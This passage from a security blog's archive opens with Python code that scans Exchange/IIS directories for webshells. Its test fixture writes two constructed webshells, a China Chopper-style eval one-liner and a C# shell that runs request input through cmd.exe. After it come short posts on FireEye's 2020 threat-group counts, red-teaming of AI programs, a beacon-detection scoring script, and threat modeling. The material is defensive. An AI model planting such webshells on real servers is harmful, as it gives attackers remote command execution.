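def find_webshells(root, modified_after=None):
    """Walk `root`; return sorted [(relative_path, reasons)] for suspicious script files.

    `modified_after` is an aware datetime; when given, files written before it are skipped,
    which narrows a hunt on a patched server to what appeared around the exploitation window.
    """
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(dirpath, name)
            if modified_after is not None:
                mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
                if mtime < modified_after:
                    continue
            reasons = scan_file(path)
            if reasons:
                hits.append((os.path.relpath(path, root).replace(os.sep, "/"), reasons))
    return sorted(hits)


def build_sample_tree():
    """Create a constructed OWA/ECP-like tree in a temp dir: one benign page, two shells."""
    root = tempfile.mkdtemp(prefix="iis-sample-")
    samples = {
        "owa/auth/logon.aspx":
            '<%@ Page Language="C#" %>\n<html><body><form>Sign in</form></body></html>\n',
        # constructed one-liner in the China Chopper shape
        "owa/auth/errorFF.aspx":
            '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
        # constructed command-execution shell
        "ecp/auth/error.aspx":
            '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %>',
    }
    for rel, body in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, why in find_webshells(build_sample_tree()):
        print(rel, why)
```

On a real server, point `find_webshells` at the Exchange FrontEnd and ClientAccess directories and compare the hits against a known-good install; a clean file list from an unpatched sibling server or the installation media is a better baseline than the signatures alone.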

Tags: Securing Networks


Apr 14 2021

FireEye: 650 new threat groups were tracked in 2020

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 10:09 am

FireEye's M-Trends 2021 report, based on data from the incidents Mandiant investigated, tracked 650 new threat groups in 2020.

FireEye published its annual report, titled M-Trends 2021, which is based on data collected from the security incidents it managed. Most of the incidents investigated by Mandiant in 2020 (59%) were initially detected by the victims themselves, up 12 percentage points from 2019.

Since its launch, Mandiant has tracked more than 2,400 threat groups, 650 of them first tracked in 2020. Over the years the experts have merged or retired approximately 500 groups, leaving more than 1,900 distinct groups under tracking at this time (100 more than in 2019).

The threat actors tracked by Mandiant include nation-state actors, financially motivated groups, and uncategorized groups (known as UNCs).

“In 2020, Mandiant experts investigated intrusions that involved 246 distinct threat groups. Organizations faced intrusions by four named financial threat (FIN) groups; six named advanced persistent threat (APT) groups, including groups from the nation-states of China, Iran and Vietnam; and 236 uncategorized threat (UNC) groups. Of the 246 threat groups observed at intrusion clients, 161 of these threat groups were newly tracked threat groups in 2020.” reads the report published by FireEye.

The Cyber Threat

Tags: new threat groups were tracked


Jul 27 2020

Facebook’s ‘Red Team’ Hacks Its Own AI Programs

Category: Hacking,Threat detection,Threat ModelingDISC @ 1:20 pm

Attackers increasingly try to confuse and bypass machine-learning systems. So the companies that deploy them are getting creative.

Source: Facebook’s ‘Red Team’ Hacks Its Own AI Programs




Tags: AI Programs, Facebook security, Facebook InfoSec, Red team


Mar 25 2020

Threat Simulation Overview and Setup – Active Countermeasures

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 11:50 am

Intro: No software project is complete without testing. In this blog series, we’ll cover how to test if your Threat Hunting platform can detect common threats.[…]

Source: Threat Simulation Overview and Setup – Active Countermeasures

Why You Need Threat Hunting!
https://www.youtube.com/watch?v=sKQHJhd-YWE

Cyber Threat Hunting: Identify and Hunt Down Intruders
https://www.youtube.com/watch?v=60pyxA0U9EQ

Real-Time Threat Hunting – SANS Threat Hunting & Incident Response Summit 2017
https://www.youtube.com/watch?v=TTbZd0he94U

Detecting Malware Beacons with Zeek and RITA
https://www.youtube.com/watch?v=eETUi-AZYgc
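The last of those talks covers beacon detection with Zeek and RITA. As an added example (not RITA's code and not from the post), the Python below scores each source/destination/port triple in Zeek-conn-style records by how regular its connection intervals and payload sizes are, using the median absolute deviation so a handful of bursts does not wreck the score. The conn records are constructed: a seeded 60-second beacon with ±3 s jitter and near-constant size against a bursty browsing session; the 10.0.0.x and 198.51.100.x addresses are placeholders.

```python
import statistics
from collections import defaultdict
from random import Random


def make_conn_log():
    """Constructed Zeek-conn-style rows: (ts, id.orig_h, id.resp_h, id.resp_p, orig_bytes)."""
    rng = Random(7)  # fixed seed so the sample is reproducible
    rows = []
    t = 0.0
    for _ in range(60):  # beacon: 60 s sleep with ±3 s jitter, check-in body of ~212 bytes
        t += 60 + rng.uniform(-3, 3)
        rows.append((t, "10.0.0.5", "198.51.100.7", 443, 212 + rng.randint(0, 4)))
    t = 0.0
    for _ in range(60):  # human browsing: bursty, irregular gaps and request sizes
        t += rng.choice([0.2, 0.5, 1, 3, 45, 300, 900])
        rows.append((t, "10.0.0.9", "198.51.100.20", 443, rng.randint(300, 20000)))
    return sorted(rows)


def _regularity(values):
    """1.0 when all values are identical, falling toward 0 as spread (MAD) approaches the median."""
    med = statistics.median(values)
    if med <= 0:
        return 0.0
    mad = statistics.median(abs(v - med) for v in values)
    return 1.0 - min(1.0, mad / med)


def beacon_scores(rows, min_conns=20):
    """Score every (src, dst, port) with at least `min_conns` connections for beacon-like behaviour."""
    by_pair = defaultdict(list)
    for ts, src, dst, port, size in rows:
        by_pair[(src, dst, port)].append((ts, size))
    scores = {}
    for pair, conns in by_pair.items():
        if len(conns) < min_conns:
            continue  # too few samples to say anything about periodicity
        conns.sort()
        gaps = [b[0] - a[0] for a, b in zip(conns, conns[1:])]
        sizes = [s for _, s in conns]
        interval = _regularity(gaps)
        size = _regularity(sizes)
        scores[pair] = {
            "conns": len(conns),
            "median_gap_s": round(statistics.median(gaps), 1),
            "interval_score": round(interval, 3),
            "size_score": round(size, 3),
            "score": round((interval + size) / 2, 3),
        }
    return scores


def ranked(rows, min_conns=20):
    """Pairs sorted from most to least beacon-like."""
    return sorted(beacon_scores(rows, min_conns).items(), key=lambda kv: -kv[1]["score"])


if __name__ == "__main__":
    for pair, s in ranked(make_conn_log()):
        print(pair, s)
```

Interval regularity alone is fooled by anything on a timer (NTP, update checks, monitoring agents), which is why the size dimension is averaged in and why real hunting still ends with looking at the destination: a scoring pass like this shortlists pairs, it does not convict them.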


Dec 30 2019

Threat Modeling for Data Protection

Category: Threat ModelingDISC @ 10:52 pm


When evaluating the security of an application and data model ask the questions:

  • What is the sensitivity of the data?
  • What are the regulatory, compliance, or privacy requirements for the data?
  • What is the attack vector that a data owner is hoping to mitigate?
  • What is the overall security posture of the environment, is it a hostile environment or a relatively trusted one?

When threat modeling, consider the following common scenarios:

Source: Threat Modeling for Data Protection



Threat Modeling in 2019
httpv://www.youtube.com/watch?v=ZoxHIpzaZ6U
